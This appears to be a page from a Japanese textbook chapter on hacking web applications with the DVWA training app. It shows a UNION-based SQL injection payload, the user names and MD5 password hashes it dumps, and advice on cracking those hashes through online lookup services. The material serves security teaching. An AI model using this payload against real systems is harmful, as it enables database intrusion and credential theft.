
609
第7章 学習用アプリによる Webアプリのハッキング
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select user,password from dvwa.users #
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select user,password from dvwa.users #
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
図7-12 暗号化されたパスワードが出力された
出力結果より、passwordに格納されたデータは「パスワードのMD5ハッシュ
値」と推測できます。
後はパスワード解析というフェーズに移ります。パスワードクラッカーで解析
してもよいのですが、DVWAは世界で広く使われているので、このハッシュ値は
すでに解析済みの可能性が高いといえます。
ハッシュ値から元の入力値を調べてくれるWebサービスがあります。これは逆
計算しているわけではなく、入力値とハッシュ値のペアをDBで管理しておき、
ハッシュ値で検索をかけて該当する元の入力値を返すという仕組みです。